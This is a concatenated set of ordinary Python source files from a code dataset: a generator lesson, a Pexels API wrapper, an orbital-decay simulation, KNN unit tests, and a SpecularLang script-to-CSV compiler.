ключевое слово yield, называется генератором.\"\"\"\ndef get_list():\n for x in[1,2,3,4]:\n yield x\n\na=get_list()\n\n# print(next(a))\n# print(next(a))\n# print(next(a))\n# print(next(a))\n# print(next(a)) # stopIteration\n\n# for x in a:\n# print(x)\n\n# # ======================================================\n\n# def fib(n):\n# if n==1:\n# return 0\n# if n==2:\n# return 1\n# else: \n# return fib(n-1)+fib(n-2)\n\n# print(fib(5))\n\n# Generator expressions\nprint((i for i in range(100000000)))\ndef multiply(a,b):\n sum=0\n return a*b\n\nprint(multiply(3,6))\n\ndef course_generator():\n yield 'Computer Science'\n yield 'Art'\n yield 'Business'\n\ncourses=course_generator()\nfor course in courses:\n print(course)\n\n# ---------------------------------------------------------\n\n\n# ---------------------------------------------------------\ndef prize_generator():\n student_info={\n 'Joan Tsark':355,\n 'Bekzod':123,\n 'Sabina':12,\n 'Kate':45\n\n }\n\n for student in student_info:\n name=student\n id=student_info[name]\n if id%3==0 and id%5==0:\n yield student+\"Get prize C\"\n elif id%3==0:\n yield student+\"Get prize B\"\n elif id%5==0:\n yield student+\"Get prize A\"\n\nprizes=prize_generator()\nfor prize in prizes:\n print(prize)\n\n\ndef factorial_generator(n):\n term = 1\n\n for i in range: \n c = term * i\n yield c\n term = c\n\nfact = factorial_generator\n\n","repo_name":"arssabina/FSPR-422","sub_path":"semester_2_Behruz/lessons/25_05.py","file_name":"25_05.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3661787194","text":"from .liblogging import logger\nfrom random import randint\nfrom .errors import PexelsError\nfrom .models import Photo\nfrom .pexelspage import PexelsPage\nfrom .settings import API_VERSION\n\n\nclass Random(PexelsPage):\n\n def __init__(self, api_key, url='/curated', api_version=API_VERSION, **kwargs):\n valid_options = ['page', 'per_page']\n self.entries_count = kwargs.get('per_page', 0)\n kwargs['per_page'] = 1\n kwargs['page'] = 1\n super(Random, self).__init__(url=url, api_key=api_key, api_version=api_version, valid_options=valid_options, **kwargs)\n\n @property\n def entries(self):\n for _ in range(self.entries_count):\n random_page = randint(1, 1000)\n random_collection = self.get_page(random_page)\n for entry in random_collection.body.get('photos', []):\n yield Photo.parse(entry)\n\n @property\n def has_next(self):\n # You can continue to get pages of random photos forever\n return True\n\n @property\n def has_previous(self):\n # You can't go back in time: no history is kept (for now)\n return False\n","repo_name":"salvoventura/pypexels","sub_path":"pypexels/src/random_.py","file_name":"random_.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"21"} +{"seq_id":"35485805203","text":"@jit\ndef oldPREvolve(a,e,T,Rfrag):\n Timestep=1*year\n #print(Timestep)\n TempT=int(10**3.)\n ShowT=int(T/TempT)\n Data=np.zeros((3,ShowT+1)) #a,e\n TempData=np.zeros((3,TempT+1))\n Data[0,:]=np.arange(0, ShowT+1)*Timestep*ShowT\n Data[1:,0]=[a,e]\n L=Luminosity((np.arange(0,T+1))+0.5e9)\n #plt.plot(Data[0, :], L, label='L')\n econstant=((5*Q)/(8*np.pi*(c**2.)))*(3/(Rfrag*Density))\n aconstant=(Q/(4*np.pi*(c**2.)))*(3/(Rfrag*Density))\n for tshow in range(0,ShowT):\n TempData[1:,0]=Data[1:,tshow]\n\n for t in range(0,TempT):\n l=L[t+(tshow*TempT)]\n TempData[1, t + 1] = TempData[1, t] - Timestep*(aconstant * L[t+(tshow*TempT)] * (2 + (3 * (TempData[2, t] ** 2.)))) / (\n TempData[1, t] * ((1 - (TempData[2, t] ** 2.)) ** 1.5)) #a\n TempData[2,t+1]=TempData[2,t]-Timestep*((econstant*L[t+(tshow*TempT)]*TempData[2,t])/((TempData[1,t]**2.)*(np.sqrt(1-(TempData[2,t]**2.)))))#e\n if TempData[1, t + 1]<(10**-2)*au:\n TempData[1, t + 1]=(10**-2)*au\n TempData[2,t+1]=0\n break\n Data[1:,tshow+1]=TempData[1:,TempT]\n if Data[1, tshow + 1] < (10 ** -2) * au:\n Data[1, tshow + 1] = (10 ** -2) * au\n Data[2, tshow + 1] = 0\n break\n return Data","repo_name":"TomMCallingham/SpaggetiAstro","sub_path":"Masters/Old/OldPReVolve.py","file_name":"OldPReVolve.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"533220183","text":"import importlib\nimport os\n\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom scipy.stats import chisquare\nfrom scipy.stats import ks_2samp\nfrom sklearn.neighbors import KDTree\nfrom sklearn.neighbors import KNeighborsRegressor\n\nfrom cgpm.knn.mvknn import MultivariateKnn\nfrom cgpm.utils import general as gu\nfrom cgpm.utils import test as tu\n\n\nO = 'outputs'\nST = 'stattypes'\nSA = 'statargs'\nN = 'numerical'\nC = 'nominal'\n\n\ndef test_initialize():\n # This test ensures that MvKnn raises on bad initialize arguments.\n # Typical initialization.\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n # No inputs allowed.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=[2], K=2,\n distargs={O: {ST:[N, C], SA: [{}, {'k': 2}]}})\n # At least two output.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[], inputs=[], K=2,\n distargs={O: {ST: [], SA:[]}})\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[1], inputs=[], K=2,\n distargs={O: {ST: [], SA:[]}})\n # Unique outputs.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 0], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n # Ensure outputs in distargs.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs=None)\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={'output': {ST: [N, C], SA: [{}, {'k': 2}]}})\n # Ensure stattypes and statargs in distargs['outputs]'\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {'stattype': [N, C], SA :[{}, {'k': 2}]}})\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], 'eland': [{}, {'k': 2}]}})\n # Ensure stattypes correct length.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C, N], SA: [{}, {'k': 2}]}})\n # Ensure statargs correct length.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, None, {'k': 2}]}})\n # Ensure number of categories provided as k.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, {'h': 2}]}})\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, {}]}})\n # Missing number of nearest neighbors K.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None,\n distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n # Bad number of nearest neighbors K.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=0,\n distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=-1,\n distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n\n\ndef test_find_neighborhoods():\n # This test target _find_neighborhoods from MultivariateKnn. See the\n # inline comments for the description of each test.\n\n # Generate a high dimensional dataset with mixed numerical/categorical.\n rng = gu.gen_rng(1)\n\n outputs = range(11)\n inputs = None\n K = 5\n stattypes = [N, N, C, N, N, N, C, N, N, C, N]\n statargs = [{}, {}, {'k':7}, {}, {}, {}, {'k':1}, {}, {}, {'k':5}, {}]\n distargs = {'outputs': {'stattypes': stattypes, 'statargs': statargs}}\n\n X = rng.rand(100, 11)\n X[:,2] = rng.choice(range(statargs[2]['k']), size=100)\n X[:,6] = rng.choice(range(statargs[6]['k']), size=100)\n X[:,9] = rng.choice(range(statargs[9]['k']), size=100)\n X[:96,10] = np.nan\n\n knn = MultivariateKnn(outputs, inputs, K=K, distargs=distargs)\n\n for i, x in enumerate(X):\n knn.incorporate(i, dict(zip(outputs, x)))\n\n assert knn.N == len(X)\n\n # Neighbor search need evidence.\n with pytest.raises(ValueError):\n knn._find_neighborhoods(query=[0,1], evidence=None)\n with pytest.raises(ValueError):\n knn._find_neighborhoods(query=[0,1], evidence={})\n\n # Bad category 199.\n with pytest.raises(ValueError):\n knn._find_neighborhoods(query=[0,1], evidence={2:199, 5:.8})\n\n # Check the returned K and dimension are correct varying query/evidence.\n for q, e in [\n ([0,1], {5:.8}),\n ([0,1,7], {5:.8}),\n ([4], {5:.8, 7:0})\n ]:\n d, nh = knn._find_neighborhoods(query=q, evidence=e)\n assert len(nh) == K\n for n in nh:\n assert 1 <= len(n) <= K\n assert d[n].shape[1] == len(q)\n\n # Dimension 10 has only 4 non-nan values, so K=5 will fail.\n with pytest.raises(ValueError):\n knn._find_neighborhoods(query=[0,1], evidence={10:.8})\n with pytest.raises(ValueError):\n knn._find_neighborhoods(query=[10,1], evidence={5:.8})\n\n # Now furnish dimension 10 with one additional non-nan value and ensure the\n # K=5 neighbors are the only possible ones i.e 0, 96, 97, 98, 99.\n knn.data[0][10] = 1\n\n def test_found_expected(dataset, neighborhoods, expect):\n for e in expect:\n match = False\n for n in neighborhoods:\n match = match or any(np.allclose(dataset[i], e) for i in n)\n assert match\n\n d_found, n_found = knn._find_neighborhoods(query=[0,1], evidence={10:.8})\n expected = [np.asarray(knn.data[r])[[0,1]]\n for r in [0, 96, 97, 98, 99]]\n test_found_expected(d_found, n_found, expected)\n\n d_found, n_found = knn._find_neighborhoods(query=[10,1], evidence={5:.8})\n expected = [np.asarray(knn.data[r])[[10,1]]\n for r in [0, 96, 97, 98, 99]]\n test_found_expected(d_found, n_found, expected)\n\n # Now make sure an exact match is in the nearest neighbor.\n z = knn.data[19]\n\n # # First crash since z contains a nan.\n with pytest.raises(ValueError):\n knn._find_neighborhoods([0,1], dict(zip(outputs[2:], z[2:])))\n\n # Now make sure that z is its own nearest neighbor.\n z_query = [0,1]\n z_evidence = {o:v for o,v in zip(outputs[2:], z[2:]) if not np.isnan(v)}\n d_found, n_found = knn._find_neighborhoods(z_query, z_evidence)\n test_found_expected(d_found, n_found, [z[:2]])\n\n\ndef test_perigee_period_given_apogee():\n # This test uses KNN to answer two BQL queries.\n # SIMULATE perigee_km, period_minutes GIVEN apogee_km = 500;\n # SIMULATE apogee_km, period_minutes;\n # The outputs of the query are scattered on a plot.\n\n rng = gu.gen_rng(1)\n\n # Load the satellites dataset.\n filename = os.path.join(\n os.path.dirname(__file__), 'graphical/resources/satellites.csv')\n satellites = pd.read_csv(filename)\n\n # Extract target columns of interest.\n D = satellites[['Apogee_km', 'Perigee_km', 'Period_minutes']].dropna()\n X = np.asarray(D)\n\n # Extract the nearest neighbors given A=500.\n tree = KDTree(X[:,0].reshape(-1,1))\n _, neighbors = tree.query([[500]], k=20)\n perigees = X[neighbors[0][:10],1]\n periods = X[neighbors[0][:10],2]\n\n # Learn the joint distribution by assuming P,T|A are independent.\n perigees_ind = rng.normal(np.mean(perigees), np.std(perigees), size=20)\n periods_ind = rng.normal(np.mean(periods), np.std(perigees), size=20)\n\n # Create a KNN.\n distargs = {\n 'outputs': {\n 'stattypes': ['numerical', 'numerical', 'numerical'],\n 'statargs': [{}, {}, {}]\n }}\n knn = MultivariateKnn([0,1,2], None, distargs=distargs, K=30, rng=rng)\n for i, row in enumerate(X):\n knn.incorporate(i, dict(zip([0,1,2], row)))\n\n # Sample from the dependent KNN.\n samples_dep = knn.simulate(-1, [1,2], {0: 500}, N=20)\n logpdfs = [knn.logpdf(-1, s, {0: 500}) for s in samples_dep]\n assert all(not np.isinf(l) for l in logpdfs)\n\n # Create an axis.\n fig, ax = plt.subplots()\n\n # Scatter the actual neighborhood.\n ax.scatter(perigees, periods, color='b', label='Actual Satellites')\n\n # Plot the independent knn.\n ax.scatter(\n perigees_ind, periods_ind, color='r', alpha=.5,\n label='Independent KNN')\n\n # Plot the dependent knn.\n ax.scatter(\n [s[1] for s in samples_dep], [s[2] for s in samples_dep],\n color='g', alpha=.5, label='Dependent KNN')\n\n # Prepare the axes.\n ax.set_title(\n 'SIMULATE Perigee_km, Period_minutes GIVEN Apogee_km = 500',\n fontweight='bold')\n ax.set_xlabel('Perigee', fontweight='bold')\n ax.set_ylabel('Period', fontweight='bold')\n ax.grid()\n ax.legend(framealpha=0, loc='upper left')\n\n # Now simulate from the joint distributions of apogee, perigee.\n samples_joint = knn.simulate(-1, [0,2], N=100)\n\n # Create an axis.\n fig, ax = plt.subplots()\n\n # Scatter the actual data.\n ax.scatter(X[:,0], X[:,2], color='b', label='Actual Satellites')\n\n # Scatter the simulated data.\n ax.scatter(\n [s[0] for s in samples_joint], [s[2] for s in samples_joint],\n color='r', label='Dependent KNN')\n\n # Prepare the axes.\n ax.set_title(\n 'SIMULATE period_minutes, apogee_km LIMIT 500', fontweight='bold')\n ax.set_xlabel('Apogee', fontweight='bold')\n ax.set_ylabel('Period', fontweight='bold')\n ax.set_xlim([-500, 50000])\n ax.set_ylim([-100, 1800])\n ax.grid()\n ax.legend(framealpha=0, loc='upper left')\n\n # Reveal!\n plt.close('all')\n\n\ndef test_serialize():\n rng = gu.gen_rng(1)\n\n data = rng.rand(20, 5)\n data[:10,-1] = 0\n data[10:,-1] = 1\n\n knn = MultivariateKnn(\n range(5),\n None,\n K=10,\n distargs={\n 'outputs': {\n 'stattypes': [\n 'numerical',\n 'numerical',\n 'numerical',\n 'numerical',\n 'categorical'\n ],\n 'statargs': [\n {},\n {},\n {},\n {},\n {'k':1}\n ]}},\n rng=rng)\n\n for rowid, x in enumerate(data):\n knn.incorporate(rowid, dict(zip(range(5), x)))\n\n knn.transition()\n\n metadata_s = json.dumps(knn.to_metadata())\n metadata_l = json.loads(metadata_s)\n\n modname = importlib.import_module(metadata_l['factory'][0])\n builder = getattr(modname, metadata_l['factory'][1])\n knn2 = builder.from_metadata(metadata_l, rng=rng)\n\n # Variable indexes.\n assert knn2.outputs == knn.outputs\n assert knn2.inputs == knn.inputs\n # Distargs.\n assert knn2.get_distargs() == knn.get_distargs()\n assert knn2.get_distargs() == knn.get_distargs()\n # Dataset.\n assert knn2.data == knn.data\n assert knn2.N == knn.N\n # Bandwidth params.\n assert knn2.stattypes == knn.stattypes\n assert knn2.statargs == knn.statargs\n\n\n# XXX The following three tests are very similar to test_normal_categorical. The\n# two tests can be merged easily and it should be done to reduce duplication.\n\ndef generate_real_nominal_data(N, rng=None):\n # Generates a bivariate dataset, where the first variable x is real-valued\n # and the second variable z is nominal with 6 levels. The real variable's\n # mean is determined by the value of z, where there are three means\n # corresponding to levels [(0,1), (2,3), (4,5)].\n\n if rng is None: rng = gu.gen_rng(0)\n T, Zv, Zc = tu.gen_data_table(\n N, [1], [[.3, .5, .2]], ['normal'], [None], [.95], rng=rng)\n data = np.zeros((N, 2))\n data[:,0] = T[0]\n indicators = [0, 1, 2, 3, 4, 5]\n counts = {0:0, 1:0, 2:0}\n for i in xrange(N):\n k = Zc[0][i]\n data[i,1] = 2*indicators[k] + counts[k] % 2\n counts[k] += 1\n return data, indicators\n\n\n@pytest.fixture(scope='module')\ndef knn_xz():\n # Learns an MvKnn on the dataset generated by generate_real_nominal_data\n # and returns the fixture for use in the next three tests.\n\n N_SAMPLES = 250\n data, indicators = generate_real_nominal_data(N_SAMPLES)\n K = MultivariateKnn(\n [0,1], None,\n K=20,\n M=5,\n distargs={'outputs': {ST: [N, C], SA:[{}, {'k': len(indicators)}]}},\n rng=gu.gen_rng(0))\n for rowid, x in enumerate(data):\n K.incorporate(rowid, {0:x[0], 1:x[1]})\n K.transition()\n return K\n\n\ndef test_joint(knn_xz):\n # Simulate from the joint distribution of x,z (see\n # generate_real_nominal_data) and perform a KS tests at each of the\n # subpopulations at the six levels of z.\n\n data = np.asarray(knn_xz.data.values())\n indicators = sorted(set(data[:,1].astype(int)))\n joint_samples = knn_xz.simulate(-1, [0,1], N=len(data))\n _, ax = plt.subplots()\n ax.set_title('Joint Simulation')\n for t in indicators:\n # Plot original data.\n data_subpop = data[data[:,1] == t]\n ax.scatter(data_subpop[:,1], data_subpop[:,0], color=gu.colors[t])\n # Plot simulated data for indicator t.\n samples_subpop = [j[0] for j in joint_samples if j[1] == t]\n ax.scatter(\n np.add([t]*len(samples_subpop), .25), samples_subpop,\n color=gu.colors[t])\n # KS test.\n pvalue = ks_2samp(data_subpop[:,0], samples_subpop)[1]\n assert .05 < pvalue\n ax.set_xlabel('z')\n ax.set_ylabel('x')\n ax.grid()\n\n\ndef test_conditional_indicator(knn_xz):\n # Simulate from the conditional distribution of x|z (see\n # generate_real_nominal_data) and perfrom a KS tests at each of the\n # subpopulations at the six levels of z.\n\n data = np.asarray(knn_xz.data.values())\n indicators = sorted(set(data[:,1].astype(int)))\n _, ax = plt.subplots()\n ax.set_title('Conditional Simulation Of X Given Indicator Z')\n for t in indicators:\n # Plot original data.\n data_subpop = data[data[:,1] == t]\n ax.scatter(data_subpop[:,1], data_subpop[:,0], color=gu.colors[t])\n # Plot simulated data.\n samples_subpop = [s[0] for s in\n knn_xz.simulate(-1, [0], evidence={1:t}, N=len(data_subpop))]\n ax.scatter(\n np.repeat(t, len(data_subpop)) + .25,\n samples_subpop, color=gu.colors[t])\n # KS test.\n pvalue = ks_2samp(data_subpop[:,0], samples_subpop)[1]\n assert .1 < pvalue\n ax.set_xlabel('z')\n ax.set_ylabel('x')\n ax.grid()\n\n\ndef test_conditional_real(knn_xz):\n # Simulate from the conditional distribution of z|x (see\n # generate_real_nominal_data) and plot the frequencies of the simulated\n # values.\n\n data = np.asarray(knn_xz.data.values())\n indicators = sorted(set(data[:,1].astype(int)))\n fig, axes = plt.subplots(2,3)\n fig.suptitle('Conditional Simulation Of Indicator Z Given X', size=20)\n # Compute representative data sample for each indicator.\n means = [np.mean(data[data[:,1]==t], axis=0)[0] for t in indicators]\n for mean, indicator, ax in zip(means, indicators, axes.ravel('F')):\n samples_subpop = [s[1] for s in\n knn_xz.simulate(-1, [1], evidence={0:mean}, N=len(data))]\n # Plot a histogram of the simulated indicator.\n ax.hist(samples_subpop, color='g', alpha=.4)\n ax.set_title('True Indicator Z %d' % indicator)\n ax.set_xlabel('Simulated Indicator Z')\n ax.set_xticks(indicators)\n ax.set_ylabel('Frequency')\n ax.set_ylim([0, ax.get_ylim()[1]+10])\n ax.grid()\n # Check that the simulated indicator agrees with true indicator.\n true_ind_a = indicator\n true_ind_b = indicator-1 if indicator % 2 else indicator+1\n counts = np.bincount(samples_subpop)\n frac = sum(counts[[true_ind_a, true_ind_b]])/float(sum(counts))\n assert .8 < frac\n","repo_name":"hiddenswitch/cgpm","sub_path":"tests/test_mvknn.py","file_name":"test_mvknn.py","file_ext":"py","file_size_in_byte":16220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"4548298214","text":"import csv\nimport os.path\nfrom SpecularLang.SpecLangTypes import Term, Operation, Type, SpecHelper, Operator, UnaryOperation\n\nfrom SpecularLang.SpecLangParser import SpecLangParser\nfrom SpecularLang.SpecLangVisitor import SpecLangVisitor\n\n\nclass SpecLangWalker(SpecLangVisitor):\n def __init__(self, save_dir='', scenes=None, talkative=1):\n self.rows = []\n self.allRows = []\n self.rowNum = 0\n self.preSceneRows = []\n self.is_prescene = True\n self.save_dir = save_dir\n self.scenes = scenes\n self.talkative = talkative\n\n def visitChoice(self, ctx:SpecLangParser.ChoiceContext):\n choices = {}\n i = 0\n while ctx.STRING(i) is not None:\n choices[\"choice{}\".format(i)] = str(ctx.STRING(i)).strip('\"')\n i += 1\n self.add_row([self.rowNum, \"Choice\", choices])\n return Term(Type.ID, '${}'.format(self.rowNum - 1))\n\n def visitDialog(self, ctx: SpecLangParser.DialogContext):\n if ctx.emotion():\n emotion = self.visit(ctx.emotion())\n i = 4\n else:\n emotion = 'Neutral'\n i = 3\n self.add_row([self.rowNum, \"Dialog\", {'speaker': str(ctx.getChild(1)), 'emotion': emotion, 'text': str(ctx.getChild(i)).strip('\"')}])\n\n def visitEmotion(self, ctx: SpecLangParser.EmotionContext):\n return ctx.getText().strip(\"(\").strip(\")\").strip('\"')\n\n def visitTerm(self, ctx: SpecLangParser.TermContext) -> Term:\n if ctx.NUMBER():\n _type = Type.NUMBER\n value = ctx.getText().strip('\"')\n elif ctx.TRUE() or ctx.FALSE():\n _type = Type.BOOL\n value = ctx.getText().strip('\"')\n elif ctx.STRING():\n _type = Type.STRING\n value = self.convert_to_specular_string_format(ctx.getText())\n elif ctx.ID():\n _type = Type.ID\n value = ctx.getText().strip('\"')\n else:\n _type = Type.NONE\n value = ctx.getText().strip('\"')\n return Term(_type, value)\n\n def visitAssignment(self, ctx: SpecLangParser.AssignmentContext):\n if ctx.GLOBAL():\n is_global = 'Yes'\n else:\n is_global = 'No'\n term = SpecHelper.to_term(self.visit(ctx.expression()))\n self.add_row([self.rowNum, \"Assign\", {'global': is_global, 'ID': str(ctx.ID()), 'type': term.type.value, 'assignment': term.value}], is_prescene=self.is_prescene)\n\n def visitAdd(self, ctx: SpecLangParser.AddContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def visitMult(self, ctx: SpecLangParser.MultContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def perform_expression(self, expression_0, expression_1, operator: Operator):\n term_0 = SpecHelper.to_term(self.visit(expression_0))\n term_1 = SpecHelper.to_term(self.visit(expression_1))\n operation = Operation(term_0, term_1, operator)\n if operation.is_either_operand_of_type_id():\n self.add_row([self.rowNum, \"Expression\", {'operator': operator.value, 'x': term_0.value, 'y': term_1.value}])\n return Term(Type.ID, '${}'.format(self.rowNum - 1))\n else:\n return operation.perform()\n\n def perform_unary_operation(self, expression, operator: Operator):\n term = SpecHelper.to_term(self.visit(expression))\n operation = UnaryOperation(self.visit(expression), operator)\n if term.type == Type.ID:\n self.add_row([self.rowNum, \"Unary\", {'operator': operator.value, 'x': term.value}])\n return Term(Type.ID, '${}'.format(self.rowNum - 1))\n else:\n return operation.perform()\n\n def visitEqual(self, ctx: SpecLangParser.EqualContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def visitAnd(self, ctx: SpecLangParser.AndContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def visitOr(self, ctx: SpecLangParser.OrContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def visitUnary(self, ctx: SpecLangParser.UnaryContext):\n return self.perform_unary_operation(ctx.expression(), Operator(str(ctx.getChild(0))))\n\n def visitParen(self, ctx: SpecLangParser.ParenContext):\n return self.visit(ctx.expression())\n\n def visitScene_statement(self, ctx:SpecLangParser.Scene_statementContext):\n if self.scenes is None or str(ctx.STRING())[1:-1] in self.scenes:\n self.is_prescene = False\n self.rows = self.preSceneRows.copy()\n self.rowNum = len(self.preSceneRows)\n self.visit(ctx.block())\n self.add_row([self.rowNum, \"StopScene\", {}])\n self.write_rows(self.rows, str(ctx.STRING())[1:-1])\n self.rows = []\n self.rowNum = 0\n self.is_prescene = True\n\n def visitIfstatement(self, ctx: SpecLangParser.IfstatementContext):\n current_row = self.rowNum\n term = SpecHelper.to_term(self.visit(ctx.expression()))\n# elseifs = ctx.else_if_statement()\n elseifs = []\n else_state = ctx.else_statement()\n elses_exist = elseifs != [] or else_state is not None\n if str(term.value) == 'True':\n self.visit(ctx.block())\n elif str(term.value) == 'False' and not elses_exist:\n return\n else:\n elif_count = 0\n self.add_row([self.rowNum, \"If\", {'condition': term.value, 'jump': 'endIf_{}'.format(current_row) if not elses_exist else 'elseif_{}'.format(current_row)}])\n self.visit(ctx.block())\n if elses_exist:\n self.add_row([self.rowNum, \"JumpToLabel\", {'name': 'endIf_{}'.format(current_row)}])\n self.add_row([self.rowNum, \"Label\", {'name': 'elseif_{}'.format(current_row)}])\n# for elseif in elseifs:\n# elif_count += 1\n# self.visit(elseif)\n if else_state:\n #self.add_row([self.rowNum, \"Label\", {'name': 'endElif_{}_{}'.format(current_row, elif_count)}])\n self.visit(else_state)\n self.add_row([self.rowNum, \"Label\", {'name': 'endIf_{}'.format(current_row)}])\n\n# def visitElse_if_statement(self, ctx:SpecLangParser.Else_if_statementContext):\n# current_row = self.rowNum\n# term = self.visit(ctx.expression())\n# self.add_row([self.rowNum, \"If\", {'condition': term['value'], 'jump': 'endElif_{}'.format(current_row)}])\n# self.visit(ctx.block())\n# self.add_row([self.rowNum, \"JumpToLabel\", {'name': 'endIf_{}'.format(current_row)}])\n# self.add_row([self.rowNum, \"Label\", {'name': 'endElif_{}'.format(current_row)}])\n\n def visitElse_statement(self, ctx:SpecLangParser.Else_statementContext):\n self.visit(ctx.block())\n\n def visitWhileLoop(self, ctx:SpecLangParser.WhileLoopContext):\n current_row = self.rowNum\n self.add_row([self.rowNum, \"Label\", {'name': 'beginWhile_{}'.format(current_row)}])\n term = SpecHelper.to_term(self.visit(ctx.expression()))\n if str(term.value) == 'True':\n raise Exception(\"While loop around line: {} will run forever (which is not allowed)\".format(current_row))\n elif str(term.value) == 'False':\n self.remove_last_row()\n return\n else:\n self.add_row([self.rowNum, \"If\", {'condition': term.value, 'jump': 'endWhile_{}'.format(current_row)}])\n self.visit(ctx.block())\n self.add_row([self.rowNum, \"JumpToLabel\", {'name': 'beginWhile_{}'.format(current_row)}])\n self.add_row([self.rowNum, \"Label\", {'name': 'endWhile_{}'.format(current_row)}])\n\n\n# Canned for now\n# def visitDoWhileLoop(self, ctx:SpecLangParser.DoWhileLoopContext):\n# current_row = self.rowNum\n# term = self.visit(ctx.expression())\n# if term['value'] == 'True':\n# raise Exception(\"Do-While loop around line: {} will run forever (which is not allowed)\".format(current_row))\n# elif term['value'] == 'False':\n# return\n# else:\n# self.add_row([self.rowNum, \"Label\", {'name': 'beginDoWhile_{}'.format(current_row)}])\n# self.visit(ctx.block())\n# self.add_row([self.rowNum, \"While\", {'condition': term['value'], 'jump': 'doWhile_{}'.format(current_row)}])\n\n def visitStage_direction(self, ctx:SpecLangParser.Stage_directionContext):\n params = {}\n i = 1\n while ctx.STRING(i) is not None:\n params[\"param{}\".format(i)] = str(ctx.STRING(i)).strip('\"')\n i += 1\n self.add_row([self.rowNum, str(ctx.STRING(0)).strip('\"'), params])\n\n\n# region: Utils\n def to_bool(self, string: str):\n if string.lower() == 'true':\n return True\n elif string.lower() == 'false':\n return False\n else:\n raise ValueError('ToBool is None!')\n\n def write_rows(self, rows: [], file_name: str):\n with open(os.path.join(self.save_dir, (file_name + '.csv')), 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file, quotechar='\"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)\n csv_writer.writerow([\"---\", \"ActionName\", \"Params\"])\n csv_writer.writerows(rows)\n if self.talkative > 0:\n print(\"Scene {} saved to file: {}\".format(file_name, csv_file.name))\n\n @staticmethod\n def to_unreal_row_structure(di: {}):\n #(actor=None,characterName={},dialogueColor=(B=0,G=0,R=0,A=255))\n new_dict = \"(\"\n for x, y in di.items():\n new_dict += '(\"{}\",\"{}\"),'.format(x, y)\n new_dict = new_dict.rstrip(\",\")\n new_dict += \")\"\n return new_dict\n\n def convert_to_specular_string_format(self, str_to_convert: str):\n # If the string we are converting doesn't have quotes then we can just return it\n if str_to_convert[0] == '\"' and str_to_convert[-1] == '\"':\n return r'\\\"{}\\\"'.format(str_to_convert[1:-1])\n else:\n return r'\\\"{}\\\"'.format(str_to_convert)\n\n def append_to_formatted_string(self, formatted_str: str, append):\n return self.convert_to_specular_string_format(formatted_str[2:-2] + append)\n\n def add_row(self, row: [], is_prescene=False):\n if is_prescene:\n self.preSceneRows.append([row[0], row[1], self.to_unreal_row_structure(row[2])])\n else:\n self.rows.append([row[0], row[1], self.to_unreal_row_structure(row[2])])\n self.allRows.append([row[0], row[1], self.to_unreal_row_structure(row[2])])\n self.rowNum += 1\n\n def remove_last_row(self):\n self.rows.pop(-1)\n self.allRows.pop(-1)\n self.rowNum -= 1\n\n","repo_name":"Bluepuff71/SpecularLang","sub_path":"SpecularLang/SpecLangWalker.py","file_name":"SpecLangWalker.py","file_ext":"py","file_size_in_byte":10936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"652734278","text":"import os\nfrom lib import EAF_tools\n\nif __name__ == \"__main__\":\n work_path = '/home/jedle/data/Sign-Language/_source_clean/annotations/new_eafs/'\n flist = [f for f in os.listdir(work_path) if '.eaf' in f]\n slovnik_path = '/home/jedle/data/Sign-Language/dictionary/'\n slovnik = os.path.join(slovnik_path, 'dictionary_dict_v4.txt')\n\n for tmp_file in flist:\n EAF_tools.parse_EAF(tmp_file, slovnik, 